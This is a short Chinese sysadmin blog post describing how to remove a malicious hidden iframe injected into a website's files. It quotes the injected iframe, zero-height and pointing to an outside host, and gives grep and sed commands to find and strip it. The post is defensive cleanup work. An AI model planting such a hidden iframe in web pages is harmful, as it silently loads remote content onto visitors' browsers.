首先利用工具分析查找出惡意代碼(firebug、httpwatch等來分析)
惡意代碼如下:
<iframe src=http://lcvo.3322.org/dszq/8.htm width=111 height=0 border=0></iframe>
解決方法:
1.查找出包含惡意代碼的所有檔案名,輸入到日志中
grep "<iframe src=http\:\/\/lcvo\.3322\.org\/dszq\/8\.htm width=111 height=0 border=0><\/iframe>" -rl /data/www/wwwroot >/root/trojan.log
2.查詢網站目錄下面所有檔案,發現檔案含有惡意代碼,删除惡意代碼!
sed -i "s/<iframe src=http\:\/\/lcvo\.3322\.org\/dszq\/8\.htm width=111 height=0 border=0><\/iframe>/ /g" `grep "<iframe src=http\:\/\/lcvo\.3322\.org\/dszq\/8\.htm width=111 height=0 border=0><\/iframe>" -rl /data/www/wwwroot/`
本文轉自 liang3391 51CTO部落格,原文連結:http://blog.51cto.com/liang3391/563649
![1、Linux 指令行使用技巧[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)